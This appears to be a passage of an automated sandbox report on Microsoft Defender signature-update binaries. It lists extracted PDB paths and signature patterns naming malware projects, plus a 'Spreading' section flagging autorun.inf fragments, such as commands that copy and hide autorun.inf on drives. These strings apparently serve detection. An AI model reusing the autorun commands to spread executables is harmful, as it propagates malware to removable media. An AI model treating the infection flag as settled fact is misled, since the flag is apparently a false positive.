Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 0000000B.00000003.18276069927.0000021B5E314000.00000004.00000001.sdmp
Source: Binary string: msiexec.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 0000000B.00000003.18294119439.0000021B5F7D9000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: E:\Other\SecEdit\Sedisk\objfre_w2K_x86\i386\Sedisk.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 0000000B.00000003.18322603018.0000021B5FB74000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 0000000B.00000003.18318367650.0000021B5EBB9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 0000000B.00000003.18319971981.0000021B5E81C000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdb source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 0000000B.00000003.18264231321.0000021B5ECC2000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 0000000B.00000003.18269858527.0000021B5F43D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 0000000B.00000003.18304834904.0000021B5E504000.00000004.00000001.sdmp
Source: Binary string: MpUxAgent.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18586235407.0000027770034000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18282591502.0000021B5FCD4000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 0000000B.00000003.18302528967.0000021B5E5CB000.00000004.00000001.sdmp
Source: Binary string: dsget.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 0000000B.00000003.18279241647.0000021B5F9D1000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-registry-l1-1-0.pdbM8 source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: enumst\release\enumst.pdb] source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 0000000B.00000003.18291243257.0000021B5DF04000.00000004.00000001.sdmp
Source: Binary string: (setup\odbcconf\exe\obj\i386\odbcconf.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: ZohoTray.pdb source: MpSigStub.exe, 0000000B.00000003.18294428456.0000021B5F85C000.00000004.00000001.sdmp
Source: Binary string: .+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 0000000B.00000003.18271875612.0000021B5DFCB000.00000004.00000001.sdmp
Source: Binary string: version.pdb@SH source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 0000000B.00000003.18319375643.0000021B5F922000.00000004.00000001.sdmp
Source: Binary string: release\wrapperex.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: ?\UltraCam\Src\UltraMap\AtTool\AtTool\obj\x64\Release\AtTool.pdba^ source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 0000000B.00000003.18303114379.0000021B5E7DA000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp
Source: Binary string: SkypeTOPA\obj\Debug\PnonaSkype.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \Release\shellcode.pdbxB source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: PCHunter64.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processtopology-obsolete-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: rasautou.pdb0 source: MpSigStub.exe, 0000000B.00000003.18268155415.0000021B5F965000.00000004.00000001.sdmp
Source: Binary string: -\CVE-2019-0803201992\x64\Release\poc_test.pdba source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp
Source: Binary string: MsMpEngCP.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: csgoInjector.pdbx source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: samlib.pdb source: MpSigStub.exe, 0000000B.00000003.18285768845.0000021B5EE0D000.00000004.00000001.sdmp
Source: Binary string: blinkopt.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: PrivacyMaster\bin\Release\PCPrivacyShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: unknowndll.pdbx source: MpSigStub.exe, 0000000B.00000003.18315597835.0000021B5F713000.00000004.00000001.sdmp
Source: Binary string: ntoskrnl.pdb source: MpSigStub.exe, 0000000B.00000003.18277664161.0000021B5E0C2000.00000004.00000001.sdmp
Source: Binary string: MpAdlStub.pdbGCTL source: mpam-796ed98e.exe, 0000000A.00000000.18177888205.00007FF69C51F000.00000002.00020000.sdmp
Source: Binary string: c:.+:\\(projects|src)\\fcrypt\\Release\\S\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: feclient.pdb source: MpSigStub.exe, 0000000B.00000003.18300370279.0000021B5E6B0000.00000004.00000001.sdmp
Source: Binary string: D:\\C\+\+\\.*ShellCode\\Release\\.*ShellCode.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 0000000B.00000003.18211949370.0000021B4BCC2000.00000004.00000001.sdmp, mpam-728dfe11.exe, 00000011.00000003.18580711669.0000027770032000.00000004.00000001.sdmp, MpSigStub.exe, 00000012.00000003.18626366853.000002DF229B4000.00000004.00000001.sdmp
Source: Binary string: ScreenSnapshot.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: Release\NTDSDumpEx.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: (\Install\trunk\out\release\setup.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: \bd2\master\bin\x64\Debug\bd2.pdb source: MpSigStub.exe, 0000000B.00000003.18277934839.0000021B5E8A0000.00000004.00000001.sdmp
Source: Binary string: \CCC\obj\Debug\CCC.pdbx source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: PasswordFox.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdbx source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: msswch.pdb source: MpSigStub.exe, 0000000B.00000003.18276333779.0000021B5E715000.00000004.00000001.sdmp
Source: Binary string: :\XiaZaiQi\pdbmap\WanNeng\Install.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: \myservice_chrome_svc.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: winsta.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: Microsoft.Exchange.Clients.Event.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: U,.+:\\src\\tcrypt\\Release\\s_(high|low).pdb source: MpSigStub.exe, 0000000B.00000003.18264513655.0000021B5DD81000.00000004.00000001.sdmp
Source: Binary string: BTR.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: :\VC5\release\kinject.dll.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: userenv.pdb3 source: MpSigStub.exe, 0000000B.00000003.18303689469.0000021B5EF98000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\chkdsk\objfre\i386\chkdsk.pdb source: MpSigStub.exe, 0000000B.00000003.18270729059.0000021B5F68E000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processenvironment-l1-2-0.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: ApplyUpdate.pdb source: MpSigStub.exe, 0000000B.00000003.18274688603.0000021B5EE4F000.00000004.00000001.sdmp
Source: Binary string: C:\projects\FinalInstaller\finalinstaller\FinalInstaller\obj\imali_release\FinalInstaller_dotnet4.pdb source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp
Source: Binary string: endpointdlp.pdbGCTL source: mpam-728dfe11.exe, 00000011.00000003.18587207189.0000027770034000.00000004.00000001.sdmp
Source: Binary string: Elevated_MpMiniSigStub.pdb source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp
Source: Binary string: \SharPersist.pdb source: MpSigStub.exe, 0000000B.00000003.18288932805.0000021B5ED46000.00000004.00000001.sdmp
Source: Binary string: \Release\Skype Utility.pdb source: MpSigStub.exe, 0000000B.00000003.18292961018.0000021B5FE60000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb source: MpSigStub.exe, 0000000B.00000003.18293714147.0000021B5DFB4000.00000004.00000001.sdmp
Source: Binary string: f:\ycc\gdrv64\objfre_wnet_AMD64\amd64\gdrv64.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: CustomPlayback*\\Release\\CustomPlayback\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: tkDecript.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: d:\Autobuild\Work\BrowserExtensions\src\NSISCouponsPlugin\bin\Win32\Release\NSISCouponsPlugin.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: C:\\Git\\[a-z]([a-z]{3,10})\\.{0,20}(Debug|Release).{0,20}\\[A-Z]\1(Exe|Dll)\.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: Release\TeamViewer.pdb source: MpSigStub.exe, 0000000B.00000003.18265076735.0000021B4BD14000.00000004.00000001.sdmp
Source: Binary string: Release\StrongVaultApp.pdb source: MpSigStub.exe, 0000000B.00000003.18270439860.0000021B5F64D000.00000004.00000001.sdmp
Source: Binary string: <Projects\CreateMessage\TestMessage\obj\Debug\ivtExchange.pdb source: MpSigStub.exe, 0000000B.00000003.18317409466.0000021B5E189000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18304567311.0000021B5E4C2000.00000004.00000001.sdmp
Source: Binary string: \\WOO\\HT\\PortReuser\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18273814701.0000021B5FC92000.00000004.00000001.sdmp
Source: Binary string: F:\hVjjmsck\zunzMo\dAQQ.pdb source: MpSigStub.exe, 0000000B.00000003.18313835752.0000021B5EED3000.00000004.00000001.sdmp
Source: Binary string: CatalinaUpdate_unsigned.pdbx| source: MpSigStub.exe, 0000000B.00000003.18311116875.0000021B5EDCA000.00000004.00000001.sdmp
Source: Binary string: ntvdm.pdb source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: offreg.pdb source: MpSigStub.exe, 0000000B.00000003.18244099358.0000021B50144000.00000004.00000001.sdmp
Source: Binary string: $loader\Driver\objfre\i386\apcdli.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: .smmservice_with_regedit\Release\smmservice.pdbx source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: d:\MPEngine\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\System.Data\System.Data.pdbp1 source: MpSigStub.exe, 0000000B.00000003.18289348845.0000021B5EDA8000.00000004.00000001.sdmp
Source: Binary string: \wtsapi32_x86.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: Release\RuPass.pdb source: MpSigStub.exe, 0000000B.00000003.18271011701.0000021B5F6D0000.00000004.00000001.sdmp
Source: Binary string: \Ships.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: Release\binkiland.exe.pdb source: MpSigStub.exe, 0000000B.00000003.18269292302.0000021B5F2B1000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-com-l1-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18260963344.0000021B5FB33000.00000004.00000001.sdmp
Source: Binary string: \release\libcurl.pdb source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: Release\toolbar.pdb source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: MpSigStub.exe, 0000000B.00000003.18281462328.0000021B5FEE5000.00000004.00000001.sdmp
Source: Binary string: smmservice_with_regedit\Release\smmservice.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: nanamnana\obj\Debug\nanamnana.pdb source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp
Source: Binary string: \tcrypt\Release\s_low.pdb source: MpSigStub.exe, 0000000B.00000003.18313547011.0000021B5FEA2000.00000004.00000001.sdmp
Source: Binary string: \TelMgr.pdb source: MpSigStub.exe, 0000000B.00000003.18290948970.0000021B5DE81000.00000004.00000001.sdmp
Source: Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: D:\Work\TopMedia\SVN\GetPrivateInstaller\DLLs\InstallerService.pdb source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp
Source: Binary string: resutils.pdb source: MpSigStub.exe, 0000000B.00000003.18301997089.0000021B5FD17000.00000004.00000001.sdmp
Source: Binary string: \\NetSpy\\Distr\\KGBSpy\\Mpk64\.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \ProcessHacker.pdb source: MpSigStub.exe, 0000000B.00000003.18288653751.0000021B5ED05000.00000004.00000001.sdmp
Source: Binary string: Release\tb_setup_zip.pdb source: MpSigStub.exe, 0000000B.00000003.18289501446.0000021B5F545000.00000004.00000001.sdmp
Source: Binary string: klovnafa.pdbx0 source: MpSigStub.exe, 0000000B.00000003.18311409111.0000021B5E1CB000.00000004.00000001.sdmp
Source: Binary string: E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18286078322.0000021B5EE90000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-string-l2-1-0.pdb source: MpSigStub.exe, 0000000B.00000003.18266494773.0000021B5F47F000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\CmdShell.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: \\dev\\Desktop\\Dropbox_control\\Client_Dropbox\\.+\.pdb source: MpSigStub.exe, 0000000B.00000003.18282861052.0000021B5E41D000.00000004.00000001.sdmp
Source: Binary string: RegCleaner\bin\Release\PCRegistryShield.pdb source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp
Source: Binary string: transmission-qt.pdb source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp

Spreading:

barindex
May infect USB drives
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 0000000B.00000003.18291526167.0000021B5EF57000.00000004.00000001.sdmp Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 0000000B.00000003.18322961234.0000021B5E610000.00000004.00000001.sdmp Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 0000000B.00000003.18267883591.0000021B5F796000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 0000000B.00000003.18290395677.0000021B5E9A8000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18304125166.0000021B5F0BC000.00000004.00000001.sdmp Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18267051812.0000021B5E85F000.00000004.00000001.sdmp Binary or memory string: autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18307613737.0000021B5E0EE000.00000004.00000001.sdmp Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18273744445.0000021B5FC83000.00000004.00000001.sdmp Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 0000000B.00000003.18260543031.0000021B5FF27000.00000004.00000001.sdmp Binary or memory string: autorun.inf4++
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: [autorun];
Source: MpSigStub.exe, 0000000B.00000003.18274099229.0000021B5F60A000.00000004.00000001.sdmp Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 0000000B.00000003.18270157644.0000021B5F4C0000.00000004.00000001.sdmp Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: shell\explore\Command=system.exewt\Autorun.inf]
Source: MpSigStub.exe, 0000000B.00000003.18323297416.0000021B4CCD0000.00000004.00000001.sdmp Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18299061122.0000021B5F89F000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18300850262.0000021B5F01C000.00000004.00000001.sdmp Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18272436681.0000021B5E9EB000.00000004.00000001.sdmp Binary or memory string: SCPT:AutorunSCPT:Autorun.executeautorun.infSCPT:Autorun.execute.shopenSHELL\OPEN\COMMAND
Source: MpSigStub.exe, 0000000B.00000003.18272436681.0000021B5E9EB000.00000004.00000001.sdmp Binary or memory string: nSCPT:Autorun.execute.shexec[autorun]action=open folder to view filesaction=abrir carpeta para ver los archivosshellexecute=icon=%systemroot%\system32\shell32.dll,4useautoplay=1[autorun]
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp Binary or memory string: ;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 0000000B.00000003.18299651733.0000021B5E105000.00000004.00000001.sdmp Binary or memory string: t;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 0000000B.00000003.18278560090.0000021B5F382000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 0000000B.00000003.18283697957.0000021B5F167000.00000004.00000001.sdmp Binary or memory string: %c:\AUTORUN.INF
Source: MpSigStub.exe, 0000000B.00000003.18292104164.0000021B5EFDB000.00000004.00000001.sdmp Binary or memory string: autorun.infx
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-796ed98e.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\ Jump to behavior
